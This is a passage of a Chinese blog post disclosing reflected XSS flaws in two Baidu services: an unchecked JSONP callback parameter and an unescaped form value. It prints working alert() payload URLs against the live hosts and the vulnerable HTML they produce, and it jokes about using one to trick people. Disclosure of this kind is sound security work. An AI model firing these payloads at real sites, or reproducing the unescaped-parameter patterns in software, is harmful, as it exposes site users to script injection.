百度空间多处XSS漏洞续篇

继续我们的XSS之旅，先来看一个YY漏洞

XSS 5: 百度PDC CallBack XSS漏洞
baidu pdc的imstate从名字上来看似乎是用来查询IM在线情况的，正常情况下的一个请求大致如下：

以下是引用片段： http://pdc.baidu.com/imstate/?callback=IM_STATUS_CALLBACK&type=json&uids=testuser

这个页面会返回一个json的值

IM_STATUS_CALLBACK({ })

但是在这里IM_STATUS_CALLBACK可以由用户控制，所以就能注入我们的恶意脚本

以下是引用片段： http://pdc.baidu.com/imstate/?callback=<script>alert(/XSS/)</script>&type=json&uids=

但是由于这里对callback的长度做了限制，又是该死的长度，所以导致我们只能玩玩这种弹框框的YY js。
但是用来骗骗小MM还是不错的。

XSS 6: 百度搜索用户反馈XSS
漏洞很简单，直接reflect

以下是引用片段： http://utility.baidu.com/quality/quality_form.php?word=“><script>alert(/Fvck+Baidu+XSS/);</script><”

看看返回结果里，发现有一处地方是htmlencode过的，但是还有一个input里的value，则没有做htmlencode，只是简单的对双引号做了下处理，从而造成了XSS

以下是引用片段： <body onload=”document.form1.requireddescription.focus()”> <form name=”form1″ method=”post” action=”quality_result.php” onSubmit=”return checkrequired(this)”> <input type=”hidden” name=”query” value=”\”><script>alert(/Fvck Baidu XSS/);</script><\”“>

 

[1] [2] [3] 下一页